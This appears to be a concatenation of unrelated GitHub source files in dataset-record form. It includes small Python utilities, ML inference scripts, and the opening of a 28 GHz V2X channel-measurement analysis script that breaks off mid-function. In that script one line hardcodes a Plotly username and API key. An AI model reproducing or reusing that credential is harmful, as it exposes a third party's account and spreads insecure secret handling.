db_categories.save()\n\n","repo_name":"ciurezbogdan/Bogdans_shop","sub_path":"products/management/commands/import_category.py","file_name":"import_category.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} {"seq_id":"29648060041","text":"import sys\n\nr, c = map(int, input().split())\n# r: rows, c: columns\n\ngraph = []\n\nfor i in range(r):\n graph.append(list(sys.stdin.readline().rstrip()))\n\nvisited = [[False] * c for _ in range(r)]\ncount = 0\n\n\ndef dfs(x, y):\n if x < 0 or x > (r - 1) or y < 0 or y > (c - 1):\n return 0\n if y == c - 1:\n return 1\n if not visited[x][y] and 
graph[x][y] == '.':\n visited[x][y] = True\n if dfs(x - 1, y + 1):\n return 1\n if dfs(x, y + 1):\n return 1\n if dfs(x + 1, y + 1):\n return 1\n return 0\n\n\nfor i in range(r):\n count += dfs(i, 0)\n\nprint(count)","repo_name":"khman119/Algorithm","sub_path":"알고리즘 유형별 기출문제/백준/그리디/3109_빵집.py","file_name":"3109_빵집.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71899096222","text":"#!/usr/bin/env python\r\n\r\n\"\"\"Consumes stream for printing all messages to the console.\r\n\"\"\"\r\n\r\nimport argparse\r\nimport json\r\nimport sys\r\nimport time\r\nimport socket\r\nfrom confluent_kafka import Consumer, KafkaError, KafkaException\r\nfrom pymongo import MongoClient\r\nimport pymongo\r\n\r\n\r\ndef msg_process(msg, collection):\r\n # Print the current time and the message.\r\n time_start = time.strftime(\"%Y-%m-%d %H:%M:%S\")\r\n val = msg.value()\r\n dval = json.loads(val)\r\n print(time_start, dval)\r\n\r\n # Almacenar el mensaje en MongoDB\r\n collection.insert_one(dval)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser(description=__doc__)\r\n parser.add_argument('topic', type=str, help='Name of the Kafka topic to stream.')\r\n args = parser.parse_args()\r\n\r\n running = True\r\n\r\n conf = {\r\n 'bootstrap.servers': 'localhost:9092', # Dirección y puerto de los servidores de Kafka\r\n 'group.id': 'my-consumer-group', # ID del grupo de consumidores\r\n }\r\n\r\n consumer = Consumer(conf)\r\n\r\n # Configurar la conexión a MongoDB\r\n client = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\n db = client[\"portdata\"]\r\n print(client.list_database_names())\r\n collection = db[\"mycollection\"]\r\n\r\n try:\r\n while running:\r\n consumer.subscribe([args.topic])\r\n\r\n msg = consumer.poll(1)\r\n if msg is None:\r\n continue\r\n\r\n if msg.error():\r\n if msg.error().code() == KafkaError._PARTITION_EOF:\r\n # End of partition event\r\n sys.stderr.write('%% %s [%d] reached end at offset %d\\n' %\r\n (msg.topic(), msg.partition(), msg.offset()))\r\n elif msg.error().code() == KafkaError.UNKNOWN_TOPIC_OR_PART:\r\n sys.stderr.write('Topic unknown, creating %s topic\\n' %\r\n (args.topic))\r\n elif msg.error():\r\n raise KafkaException(msg.error())\r\n else:\r\n msg_process(msg, collection)\r\n\r\n except KeyboardInterrupt:\r\n pass\r\n\r\n finally:\r\n # Close down consumer to commit final offsets.\r\n consumer.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Ainhoa1409/Logistica_puerto","sub_path":"time-series-kafka-demo/bin/processStream.py","file_name":"processStream.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33218303510","text":"import sys\nimport reader\n\nif len(sys.argv) > 1:\n r = reader.Reader(sys.argv[1])\n try:\n print(r.read())\n finally:\n r.close()\n\nclass CallCount:\n def __init__(self, f):\n print('Creating Instance of {}'.format(__name__))\n self.f = f\n self.count = 0\n def action(self):\n print('Action')\n def __call__(self, *args, **kwargs):\n self.count += 1\n return self.f(*args, **kwargs)\n\n\n@CallCount\ndef test():\n print('MyFunction')\n\ntest()\ntest()\ntest()\nprint(test.count) 
","repo_name":"albertocota/bz2_gzip","sub_path":"reader/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30386718045","text":"import boto3\n\ndef check_status(app_name):\n sage_client = boto3.client('sagemaker', region_name=\"us-west-2\")\n endpoint_description = sage_client.describe_endpoint(EndpointName=app_name)\n return endpoint_description['EndpointStatus']\n\napp_name = 'dl-sentiment-model'\n\nprint(\"Application status is: {}\".format(check_status(app_name)))\n\nif check_status(app_name) == 'InService':\n client = boto3.client('sagemaker-runtime')\n\n content_type = \"application/json; format=pandas-split\" \n accept = \"text/plain\" \n payload = '{\"columns\": [\"text\"],\"data\": [[\"This is the best movie we saw.\"], [\"What a movie!\"]]}'\n\n response = client.invoke_endpoint(\n EndpointName=app_name, \n ContentType=content_type,\n Accept=accept,\n Body=payload\n )\n\n print(response['Body'].read().decode('utf-8')) ","repo_name":"PacktPublishing/Practical-Deep-Learning-at-Scale-with-MLFlow","sub_path":"chapter08/sagemaker/query_sagemaker_endpoint.py","file_name":"query_sagemaker_endpoint.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"7"} +{"seq_id":"16148752393","text":"from text_cnn import TextCNN\nfrom config import FLAGS\nimport tensorflow as tf\nimport data_helper\n\nx_test_data, y_test = data_helper.load_data_and_labels(FLAGS.test_data_file, FLAGS.test_label_file)\n\npadded_sentences_test, max_padding_length = data_helper.padding_sentence(\n sentences=x_test_data,\n padding_sentence_length=FLAGS.padding_sentence_length,\n padding_move=FLAGS.padding_move)\n\nx_test, vocabulary_len = data_helper.embedding_sentences(\n embedding_file=FLAGS.embedding_file, padded_sentences=padded_sentences_test,\n embedding_dimension=FLAGS.embedding_dimension)\n\nprint(\"x_test.shape = {}\".format(x_test.shape))\nprint(\"y_test.shape = {}\".format(y_test.shape))\n\ncnn = TextCNN(sequence_length=FLAGS.padding_sentence_length,\n num_classes=FLAGS.num_classes,\n embedding_dimension=FLAGS.embedding_dimension,\n filter_sizes=list(map(int, FLAGS.filter_size.split(','))),\n num_filters=FLAGS.num_filters,\n l2_reg_lambda=FLAGS.L2_reg_lambda\n )\n\nwith tf.Session() as sess:\n saver = tf.train.Saver()\n saver.restore(sess, tf.train.latest_checkpoint(FLAGS.model_save_path))\n feed_dic = {cnn.input_x: x_test, cnn.input_y: y_test, cnn.dropout_keep_prob: 1.0}\n acc = sess.run(cnn.accuracy, feed_dict=feed_dic)\n print('----acc:{}---'.format(acc))\n","repo_name":"TolicWang/Practice","sub_path":"CNN/TaxCode/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"} +{"seq_id":"31627251752","text":"from pathlib import Path\n\nimport gradio as gr\nimport numpy as np\nfrom fastai.vision.all import *\n\n\ndef label(file_name):\n return train_labels[file_name.replace(\".jpg\", \"\")]\n\nconfig = {\n \"labels\": [\n \"Plantation (0)\",\n \"Grassland (1)\",\n \"Smallholder Agriculture (2)\",\n ],\n \"size\": 256,\n}\n\n\n\nlearn = load_learner(\"model.pkl\")\n\ndef classify_image(input):\n _, _, prediction = learn.predict(input)\n outputs = {label: float(prediction[i]) for i, label in enumerate(config[\"labels\"])}\n # Get argmax\n argmax_label = 
config[\"labels\"][np.argmax(prediction)]\n return argmax_label, round(outputs[argmax_label], 3) * 100\n\n\ngr.Interface(\n fn=classify_image, \n inputs=gr.inputs.Image(shape=(config[\"size\"], config[\"size\"])),\n outputs=[\n gr.outputs.Textbox(label=\"Output of the model\"),\n gr.outputs.Textbox(label=\"Probability (0 - 100)\")\n ],\n examples=[str(x) for x in Path(\"./\").glob(\"*.png\")],\n flagging_options=[\"Correct label\", \"Incorrect label\"],\n allow_flagging=\"manual\",\n).launch()\n","repo_name":"david26694/deforestation","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"31764961066","text":"\"\"\"\r\nThis script encapsulates the operations involved in estimating the propagation parameters associated with the various\r\nMulti-Path Components (MPCs) in our 28 GHz outdoor measurement campaign on the POWDER testbed. It also describes the\r\nvisualizations of the RMS delay- & direction-spread characteristics obtained from this 28 GHz V2X channel modeling.\r\nFurthermore, it includes spatial decoherence analyses w.r.t Tx-Rx distance, alignment, and relative velocity.\r\n\r\nAdditionally, as a part of our evaluations, we incorporate visualizations of the Power Delay Doppler Profiles (PDDPs),\r\nthe Power Delay Angular Profiles (PDAPs), the normalized Doppler spectrum, and the cluster-decay characteristics.\r\n\r\nLastly, we analyze these results for the Saleh-Valenzuela (SV), Quasi-Deterministic (QD), and Device-to-Device (D2D)\r\nchannel models to empirically validate the correctness of such widely-used mmWave channel models.\r\n\r\nReference Papers:\r\n\r\n@INPROCEEDINGS{SAGE,\r\n title={A sliding-correlator-based SAGE algorithm for mmWave wideband channel parameter estimation},\r\n author={Yin, Xuefeng and He, Yongyu and Song, Zinuo and Kim, Myung-Don and Chung, Hyun Kyu},\r\n booktitle={The 8th European Conference on Antennas and Propagation (EuCAP 2014)},\r\n year={2014}, pages={625-629}, doi={10.1109/EuCAP.2014.6901837}}.\r\n\r\n@ARTICLE{Spatial-Consistency-I,\r\n title={Statistical channel impulse response models for factory and open plan building radio system design},\r\n author={Rappaport, T.S. and Seidel, S.Y. and Takamizawa, K.},\r\n journal={IEEE Transactions on Communications},\r\n pages={794-807}, doi={10.1109/26.87142},\r\n year={1991}, volume={39}, number={5}}.\r\n\r\n@INPROCEEDINGS{Spatial-Consistency-II,\r\n author={Sun, Shu and Yan, Hangsong and MacCartney, George R. and Rappaport, Theodore S.},\r\n title={Millimeter wave small-scale spatial statistics in an urban microcell scenario},\r\n booktitle={2017 IEEE Int. Conf. on Commun. 
(ICC)},\r\n doi={10.1109/ICC.2017.7996408},\r\n pages={1-7}, year={2017}}.\r\n\r\n@INPROCEEDINGS{PDDPs,\r\n title={28-GHz High-Speed Train Measurements and Propagation Characteristics Analysis},\r\n booktitle={2020 14th European Conference on Antennas and Propagation (EuCAP)},\r\n author={Park, Jae-Joon and Lee, Juyul and Kim, Kyung-Won and Kim, Myung-Don},\r\n year={2020}, pages={1-5}, doi={10.23919/EuCAP48036.2020.9135221}}.\r\n\r\n@ARTICLE{PDAPs,\r\n title={Measurement-Based 5G mmWave Propagation Characterization in Vegetated Suburban Macrocell Environments},\r\n author={Zhang, Peize and Yang, Bensheng and Yi, Cheng and Wang, Haiming and You, Xiaohu},\r\n journal={IEEE Transactions on Antennas and Propagation},\r\n year={2020}, volume={68}, number={7}, pages={5556-5567},\r\n doi={10.1109/TAP.2020.2975365}}.\r\n\r\n@ARTICLE{Channel-Models-I,\r\n author={Gustafson, Carl and Haneda, Katsuyuki and Wyne, Shurjeel and Tufvesson, Fredrik},\r\n title={On mm-Wave Multipath Clustering and Channel Modeling},\r\n journal={IEEE Transactions on Antennas and Propagation},\r\n year={2014}, volume={62}, number={3}, pages={1445-1455},\r\n doi={10.1109/TAP.2013.2295836}}\r\n\r\n@INPROCEEDINGS{Channel-Models-II,\r\n author={Gustafson, Carl and Tufvesson, Fredrik and Wyne, Shurjeel and Haneda, Katsuyuki and Molisch, Andreas F.},\r\n title={Directional Analysis of Measured 60 GHz Indoor Radio Channels Using SAGE},\r\n booktitle={2011 IEEE 73rd Vehicular Technology Conference (VTC Spring)},\r\n year={2011}, volume={}, number={}, pages={1-5},\r\n doi={10.1109/VETECS.2011.5956639}}\r\n\r\n@INPROCEEDINGS{Channel-Models-III,\r\n author={Lecci, Mattia and Polese, Michele and Lai, Chiehping and Wang, Jian and Gentile, Camillo and Golmie, et al.},\r\n title={Quasi-Deterministic Channel Model for mmWaves: Mathematical Formalization and Validation},\r\n booktitle={GLOBECOM 2020 - 2020 IEEE Global Communications Conference},\r\n year={2020}, pages={1-6}, doi={10.1109/GLOBECOM42002.2020.9322374}}\r\n\r\n\r\nAuthor: Bharath Keshavamurthy \r\nOrganization: School of Electrical and Computer Engineering, Purdue University, West Lafayette, IN\r\n School of Electrical, Computer and Energy Engineering, Arizona State University, Tempe, AZ\r\n\r\nCopyright (c) 2023. 
All Rights Reserved.\r\n\"\"\"\r\n\r\nimport os\r\nimport re\r\nimport json\r\nimport plotly\r\nimport requests\r\nimport datetime\r\nimport scipy.io\r\nimport traceback\r\n# import functools\r\nimport dataclasses\r\nimport numpy as np\r\n# import cvxpy as cp\r\nfrom enum import Enum\r\nfrom geopy import distance\r\nimport plotly.graph_objs as go\r\nfrom json import JSONDecodeError\r\nfrom dataclasses import dataclass\r\nfrom scipy import signal, constants\r\nfrom typing import Tuple, List, Dict\r\n# from scipy.interpolate import interp1d\r\n# from dataclasses import dataclass, field\r\nimport sk_dsp_comm.fir_design_helper as fir_d\r\nfrom concurrent.futures import ThreadPoolExecutor\r\n\r\n\"\"\"\r\nINITIALIZATIONS I: Collections & Utilities\r\n\"\"\"\r\npi, c, distns, alignments, velocities = np.pi, constants.c, [], [], []\r\ndeg2rad, rad2deg = lambda x: x * (pi / 180.0), lambda x: x * (180.0 / pi)\r\nlinear_1, linear_2 = lambda x: 10 ** (x / 10.0), lambda x: 10 ** (x / 20.0)\r\nrx_gps_events, tx_imu_traces, rx_imu_traces, pdp_segments, pods = [], [], [], [], []\r\ndecibel_1, decibel_2, gamma = lambda x: 10 * np.log10(x), lambda x: 20 * np.log10(x), lambda fc, fc_: fc / (fc - fc_)\r\n\r\n\"\"\"\r\nINITIALIZATIONS II: Enumerations & Dataclasses (Inputs)\r\n\"\"\"\r\n\r\n\r\nclass Units(Enum):\r\n METERS = 0\r\n CENTIMETERS = 1\r\n MILLIMETERS = 2\r\n DEGREES = 3\r\n MINUTES = 4\r\n SECONDS = 5\r\n INCHES = 6\r\n FEET = 7\r\n YARDS = 8\r\n DIMENSIONLESS = 9\r\n UNKNOWN = 10\r\n\r\n\r\nclass FixType(Enum):\r\n NO_FIX = 0\r\n DEAD_RECKONING = 1\r\n TWO_DIMENSIONAL = 2\r\n THREE_DIMENSIONAL = 3\r\n GNSS = 4\r\n TIME_FIX = 5\r\n\r\n\r\nclass CarrierSolutionType(Enum):\r\n NO_SOLUTION = 0\r\n FLOAT_SOLUTION = 1\r\n FIXED_SOLUTION = 2\r\n\r\n\r\n@dataclass(order=True)\r\nclass Member:\r\n is_high_precision: bool = False\r\n main_component: float = 0.0\r\n high_precision_component: float = 0.0\r\n component: float = 0.0\r\n precision: float = 0.0\r\n units: Units = Units.DIMENSIONLESS\r\n\r\n\r\n@dataclass(order=True)\r\nclass GPSEvent:\r\n seq_number: int = 0\r\n timestamp: str = str(datetime.datetime.utcnow())\r\n is_gnss_fix_ok: bool = False\r\n siv: int = 0\r\n fix_type: FixType = FixType.NO_FIX\r\n carrier_solution_type: CarrierSolutionType = CarrierSolutionType.NO_SOLUTION\r\n latitude: Member = Member() # components: deg\r\n longitude: Member = Member() # components: deg\r\n altitude_ellipsoid: Member = Member() # components: m\r\n altitude_msl: Member = Member() # components: m\r\n speed: Member = Member() # components: ms-1\r\n heading: Member = Member()\r\n horizontal_acc: Member = Member() # components: ms-2\r\n vertical_acc: Member = Member() # components: ms-2\r\n speed_acc: Member = Member()\r\n heading_acc: Member = Member()\r\n ned_north_vel: Member = Member()\r\n ned_east_vel: Member = Member()\r\n ned_down_vel: Member = Member()\r\n pdop: Member = Member()\r\n mag_acc: Member = Member()\r\n mag_dec: Member = Member()\r\n geometric_dop: Member = Member()\r\n position_dop: Member = Member()\r\n time_dop: Member = Member()\r\n horizontal_dop: Member = Member()\r\n vertical_dop: Member = Member()\r\n northing_dop: Member = Member()\r\n easting_dop: Member = Member()\r\n horizontal_accuracy: Member = Member() # components: ms-2\r\n vertical_accuracy: Member = Member() # components: m\r\n ultra_core_length: int = 16\r\n core_length: int = 37\r\n total_length: int = 39\r\n\r\n\r\n@dataclass(order=True)\r\nclass IMUTrace:\r\n seq_number: int = 0\r\n timestamp: str = 
str(datetime.datetime.utcnow())\r\n yaw_angle: float = 0.0 # deg\r\n pitch_angle: float = 0.0 # deg\r\n\r\n\r\n\"\"\"\r\nCONFIGURATIONS: A few route-specific Plotly visualization options\r\n Input & Output Dirs | GPS & IMU logs | Power delay profiles\r\n\"\"\"\r\n\r\n''' urban-campus-I route (semi-autonomous) (1400 E St) '''\r\ncomm_dir = 'E:/SPAVE-28G/analyses/urban-campus-I/rx-realm/pdp/'\r\nrx_gps_dir = 'E:/SPAVE-28G/analyses/urban-campus-I/rx-realm/gps/'\r\nrx_imu_dir = 'E:/SPAVE-28G/analyses/urban-campus-I/rx-realm/imu/'\r\ntx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-campus-I/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'uc_rms_delay_spread.png', 'uc_aoa_rms_dir_spread.png'\r\nsc_distance_png, sc_alignment_png, sc_velocity_png = 'uc_sc_dist.png', 'uc_sc_alignment.png', 'uc_sc_vel.png'\r\n\r\n''' urban-campus-II route (fully-autonomous) (President's Circle) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-campus-II/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-campus-II/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-campus-II/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-campus-II/tx-realm/imu/', 5\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'ucc_rms_delay_spread.png', 'ucc_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'ucc_sc_dist.png', 'ucc_sc_alignment.png', 'ucc_sc_vel.png'\r\n\r\n''' urban-campus-III route (fully-autonomous) (100 S St) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-campus-III/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-campus-III/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-campus-III/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-campus-III/tx-realm/imu/', 5\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'uccc_rms_delay_spread.png', 'uccc_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'uccc_sc_dist.png', 'uccc_sc_alignment.png', 'uccc_sc_vel.png'\r\n\r\n''' urban-garage route (fully-autonomous) (NW Garage on 1460 E St) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-garage/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-garage/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-garage/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-garage/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'ug_rms_delay_spread.png', 'ug_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'ug_sc_distance.png', 'ug_sc_alignment.png', 'ug_sc_velocity.png'\r\n\r\n''' urban-stadium route (fully-autonomous) (E South Campus Dr) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-stadium/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-stadium/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-stadium/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-stadium/tx-realm/imu/', 5\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'us_rms_delay_spread.png', 'us_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'us_sc_distance.png', 'us_sc_alignment.png', 'us_sc_velocity.png'\r\n\r\n''' suburban-fraternities route (fully-autonomous) (S Wolcott St) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/suburban-fraternities/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/suburban-fraternities/rx-realm/gps/'\r\n# rx_imu_dir = 
'E:/SPAVE-28G/analyses/suburban-fraternities/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/suburban-fraternities/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'sf_rms_delay_spread.png', 'sf_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'sf_sc_distance.png', 'sf_sc_alignment.png', 'sf_sc_velocity.png'\r\n\r\n''' urban-vegetation route (fully-autonomous) (Olpin Union Bldg) '''\r\n# comm_dir = 'E:/SPAVE-28G/analyses/urban-vegetation/rx-realm/pdp/'\r\n# rx_gps_dir = 'E:/SPAVE-28G/analyses/urban-vegetation/rx-realm/gps/'\r\n# rx_imu_dir = 'E:/SPAVE-28G/analyses/urban-vegetation/rx-realm/imu/'\r\n# tx_imu_dir, tx_imu_skip_step = 'E:/SPAVE-28G/analyses/urban-vegetation/tx-realm/imu/', 1\r\n# rms_delay_spread_png, aoa_rms_dir_spread_png = 'uv_rms_delay_spread.png', 'uv_aoa_rms_dir_spread.png'\r\n# sc_distance_png, sc_alignment_png, sc_velocity_png = 'uv_sc_distance.png', 'uv_sc_alignment.png', 'uv_sc_velocity.png'\r\n\r\n''' Tx location fixed on the rooftop of the William Browning Building in SLC, UT '''\r\ntx_gps_event = GPSEvent(latitude=Member(component=40.766173670),\r\n longitude=Member(component=-111.847939330), altitude_ellipsoid=Member(component=1459.1210))\r\n\r\n''' Generic configurations '''\r\n# output_dir = 'E:/Workspace/SPAVE-28G/test/analyses/'\r\nant_log_file = 'E:/SPAVE-28G/analyses/antenna_pattern.mat'\r\n# n_sigma, max_ant_gain, pn_reps, max_mpcs = 0.015, 22.0, 100\r\nne_amp_threshold, max_workers, sg_wsize, sg_poly_order = 0.05, 4096, 53, 3\r\nmin_threshold, sample_rate, datetime_format = 1e5, 2e6, '%Y-%m-%d %H:%M:%S.%f'\r\nd_max, d_step, a_max, a_step, v_max, v_step = 500.0, 1.0, 10.0, 0.05, 10.0, 0.1\r\n# delay_tol, doppler_tol, att_tol, aoa_az_tol, aoa_el_tol = 1e-9, 1.0, 0.1, 0.1, 0.1\r\nplotly.tools.set_credentials_file(username='bkeshava_bkeshav1', api_key='hspqOdIFQcnHdlL7MGch')\r\n# tau_min, tau_max, nu_min, nu_max, phi_min, phi_max, the_min, the_max = 1e-9, 1e-6, 0.0, 1e3, -pi, pi, -pi, pi\r\ntime_windowing_config = {'window_multiplier': 2.0, 'truncation_length': int(2e5), 'truncation_multiplier': 4.0}\r\n# tx_fc, rx_fc, pn_v0, pn_l, pn_m, wlength, pn_reps = 400e6, 399.95e6, 0.5, 11, 2047, c / 28e9, int(pn_m / pn_l)\r\npdp_samples_file, start_timestamp_file, parsed_metadata_file = 'samples.log', 'timestamp.log', 'parsed_metadata.log'\r\nprefilter_config = {'passband_freq': 60e3, 'stopband_freq': 65e3, 'passband_ripple': 0.01, 'stopband_attenuation': 80.0}\r\n\r\n\"\"\"\r\nINITIALIZATIONS III: Enumerations & Dataclasses (Temps | Outputs)\r\n\"\"\"\r\n\r\n\"\"\"\r\n@dataclass(order=True)\r\nclass MPCParameters:\r\n path_number: int = 0\r\n delay: float = 0.0 # s\r\n aoa_azimuth: float = 0.0 # rad\r\n aoa_elevation: float = 0.0 # rad\r\n doppler_shift: float = 0.0 # Hz\r\n profile_point_power: float = 0.0 # linear\r\n attenuation: float = complex(0.0, 0.0) # linear (complex)\r\n\"\"\"\r\n\r\n\r\n@dataclass(order=True)\r\nclass PDPSegment:\r\n seq_number: int = 0\r\n timestamp: str = str(datetime.datetime.utcnow())\r\n sample_rate: float = 2e6 # sps\r\n rx_freq: float = 2.5e9 # Hz\r\n item_size: int = 8\r\n core_header_length: int = 149\r\n extra_header_length: int = 22\r\n header_length: int = 171\r\n num_samples: int = int(1e6)\r\n num_bytes: int = num_samples * item_size\r\n raw_rx_samples: np.array = np.array([], dtype=np.csingle) # complex I/Q-64\r\n processed_rx_samples: np.array = np.array([], dtype=np.csingle) # complex I/Q-64\r\n correlation_peak: float = 0.0 # 
linear\r\n\r\n\r\n@dataclass(order=True)\r\nclass Pod:\r\n seq_number: int = 0\r\n timestamp: str = str(datetime.datetime.utcnow())\r\n tx_gps_event: GPSEvent = GPSEvent()\r\n rx_gps_event: GPSEvent = GPSEvent()\r\n tx_imu_trace: IMUTrace = IMUTrace()\r\n rx_imu_trace: IMUTrace = IMUTrace()\r\n tx_elevation: float = 0.0 # m\r\n rx_elevation: float = 0.0 # m\r\n tx_rx_alignment: float = 0.0 # deg\r\n tx_rx_distance_2d: float = 0.0 # m\r\n tx_rx_distance_3d: float = 0.0 # m\r\n pdp_segment: PDPSegment = PDPSegment()\r\n # n_mpcs: int = max_mpcs\r\n # mpc_parameters: List[MPCParameters] = field(default_factory=lambda: (MPCParameters() for _ in range(max_mpcs)))\r\n rms_delay_spread: float = 0.0 # s\r\n rms_aoa_dir_spread: float = 0.0 # no-units (normalized)\r\n\r\n\r\n\"\"\"\r\nCORE ROUTINES\r\n\"\"\"\r\n\r\n\r\n# Pack a dictionary into a dataclass instance\r\ndef ddc_transform(d: Dict, dc: dataclass) -> dataclass:\r\n d_l, d_f = {}, {f.name: f.type for f in dataclasses.fields(dc)}\r\n\r\n for k, v in d.items():\r\n d_l[k] = (lambda: v, lambda: ddc_transform(v, Member))[d_f[k] == Member]()\r\n\r\n return dc(**d_l)\r\n\r\n\r\n# Parse the provided file and store it in the given collection\r\ndef parse(d: List, dc: dataclass, fn: str) -> None:\r\n with open(fn) as f:\r\n d.append(ddc_transform(json.load(f), dc))\r\n\r\n\r\n# Yaw angle getter (deg)\r\ndef yaw(m: IMUTrace) -> float:\r\n return m.yaw_angle\r\n\r\n\r\n# Pitch angle getter (deg)\r\ndef pitch(m: IMUTrace) -> float:\r\n return m.pitch_angle\r\n\r\n\r\n# Latitude getter (deg)\r\ndef latitude(y: GPSEvent) -> float:\r\n return y.latitude.component\r\n\r\n\r\n# Longitude getter (deg)\r\ndef longitude(y: GPSEvent) -> float:\r\n return y.longitude.component\r\n\r\n\r\n# Altitude getter (m)\r\ndef altitude(y: GPSEvent) -> float:\r\n return y.altitude_ellipsoid.component\r\n\r\n\r\n# Tx-Rx 2D distance (m)\r\ndef tx_rx_distance_2d(tx: GPSEvent, rx: GPSEvent) -> float:\r\n coords_tx = (latitude(tx), longitude(tx))\r\n coords_rx = (latitude(rx), longitude(rx))\r\n return distance.distance(coords_tx, coords_rx).m\r\n\r\n\r\n# Tx-Rx 3D distance (m)\r\ndef tx_rx_distance_3d(tx: GPSEvent, rx: GPSEvent) -> float:\r\n alt_tx, alt_rx = altitude(tx), altitude(rx)\r\n return np.sqrt(np.square(tx_rx_distance_2d(tx, rx)) + np.square(alt_tx - alt_rx))\r\n\r\n\r\n# General 3D distance (m)\r\ndef distance_3d(y1: GPSEvent, y2: GPSEvent) -> float:\r\n coords_y1 = (latitude(y1), longitude(y1))\r\n coords_y2 = (latitude(y2), longitude(y2))\r\n alt_y1, alt_y2 = altitude(y1), altitude(y2)\r\n distance_2d = distance.distance(coords_y1, coords_y2).m\r\n return np.sqrt(np.square(distance_2d) + np.square(alt_y1 - alt_y2))\r\n\r\n\r\n# Tx-Rx difference in alignment (deg)\r\ndef d_alignment(y1: GPSEvent, y2: GPSEvent, m: IMUTrace, is_tx=True) -> Tuple:\r\n y1_lat, y1_lon, y1_alt = latitude(y1), longitude(y1), altitude(y1)\r\n y2_lat, y2_lon, y2_alt = latitude(y2), longitude(y2), altitude(y2)\r\n\r\n '''\r\n Modeled from RxRealms.py - Utilities.py | principal_axes_positioning\r\n '''\r\n\r\n if is_tx:\r\n yaw_calc = rad2deg(np.arctan((y1_lat - y2_lat) / (np.cos(deg2rad(y1_lat)) * (y1_lon - y2_lon))))\r\n else:\r\n yaw_calc = rad2deg(np.arctan((y2_lat - y1_lat) / (np.cos(deg2rad(y2_lat)) * (y2_lon - y1_lon))))\r\n\r\n if y1_lat <= y2_lat:\r\n yaw_calc += 270.0 if yaw_calc >= 0.0 else 90.0\r\n else:\r\n yaw_calc += 90.0 if yaw_calc >= 0.0 else 270.0\r\n\r\n pitch_calc = rad2deg(np.arctan((y2_alt - y1_alt) / abs(np.cos(deg2rad(y1_lat)) * (y1_lon - y2_lon))))\r\n pitch_calc /= 
